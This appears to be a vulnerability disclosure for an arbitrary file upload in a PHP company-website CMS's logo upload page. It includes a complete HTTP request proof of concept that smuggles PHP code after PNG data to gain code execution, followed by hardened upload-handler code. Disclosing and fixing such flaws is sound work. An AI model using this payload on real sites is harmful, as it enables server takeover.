| Field | Value |
|---|---|
| Title | Company Website CMS Background file upload getshell RCE |
| Source | https://www.sourcecodester.com/php/15517/company-website-cms-php.html |
| User | jsbae3449 (UID 30775) |
| Submission | 08/09/2022 12:26 (4 years ago) |
| Moderation | 08/09/2022 14:43 (2 hours later) |
| Status | Accepted |
| VulDB entry | 205881 [SourceCodester Company Website CMS Background Upload Logo Icon updatelogo.php xfile/ufile unrestricted upload] |
| Points | 20 |

Description:

info: There is an arbitrary file upload vulnerability in the company's website CMS background upload logo icon.
Upload the logo in the background, capture the package and modify the suffix to php.
Add the php code getshell at the end of the picture to realize RCE.
Then copy the logo image address in the upper left corner of the background to access.

URL: https://www.sourcecodester.com/php/15517/company-website-cms-php.html

payload:

```http
POST /dashboard/updatelogo.php HTTP/1.1
Host: 10.11.20.110:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------897055484585946140954985216
Content-Length: 1732
Origin: http://10.11.20.110:8090
Connection: close
Referer: http://10.11.20.110:8090/dashboard/updatelogo.php
Cookie: PHPSESSID=osasi2heuvl3l3ekci99lt0tmt
Upgrade-Insecure-Requests: 1

-----------------------------897055484585946140954985216
Content-Disposition: form-data; name="xfile"; filename="123.php"
Content-Type: image/png

PNG
[ Note that normal picture information is required here ]
-----------------------------897055484585946140954985216
Content-Disposition: form-data; name="ufile"; filename="123.php"
Content-Type: image/png

PNG
[ Note that normal picture information is required here ]
<?php phpinfo();?>
-----------------------------897055484585946140954985216
Content-Disposition: form-data; name="save"

-----------------------------897055484585946140954985216--
```
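The report shows two weaknesses in the logo upload: the client-supplied filename suffix is kept, and an image check is satisfied by valid picture data with PHP appended after it. The handler below is an added illustration of the corresponding fixes, not the CMS's own code: it ignores the submitted filename and Content-Type, verifies the content with getimagesize(), re-encodes the image through GD so trailing PHP does not survive, and stores it under a server-chosen name with a fixed extension. The field name ufile comes from the report; the uploads directory and size limit are assumptions.

```php
<?php
// Added example: hardened logo upload for the form field "ufile" (field name from the report).
// Assumptions: files are stored under ./uploads/, a directory the web server is configured
// not to execute scripts from, and the logo is always written as PNG.
declare(strict_types=1);

const LOGO_DIR      = __DIR__ . '/uploads';
const MAX_LOGO_SIZE = 2 * 1024 * 1024; // 2 MiB, assumed limit

function save_logo(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_LOGO_SIZE || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('rejected');
    }
    // Check the real content, never the client-supplied filename or Content-Type.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !in_array($info[2], [IMAGETYPE_PNG, IMAGETYPE_JPEG], true)) {
        throw new RuntimeException('not an image');
    }
    // Re-encode through GD: bytes appended after valid image data (the "<?php" tail
    // in the report) are not part of the decoded pixels and are dropped on re-encoding.
    $img = $info[2] === IMAGETYPE_PNG
        ? imagecreatefrompng($file['tmp_name'])
        : imagecreatefromjpeg($file['tmp_name']);
    if ($img === false) {
        throw new RuntimeException('decode failed');
    }
    // Server-chosen name with a fixed extension: a filename such as "123.php" is ignored.
    $dest = LOGO_DIR . '/logo_' . bin2hex(random_bytes(8)) . '.png';
    if (!imagepng($img, $dest)) {
        imagedestroy($img);
        throw new RuntimeException('write failed');
    }
    imagedestroy($img);
    chmod($dest, 0644);
    return basename($dest);
}

if (isset($_FILES['ufile'])) {
    try {
        echo 'saved as ' . htmlspecialchars(save_logo($_FILES['ufile']), ENT_QUOTES);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo 'upload rejected';
    }
}
```

Storing logos outside the document root, or in a directory where the web server's PHP handler is disabled, is a second, independent layer: even a file that slipped through validation would then be served as static bytes rather than executed.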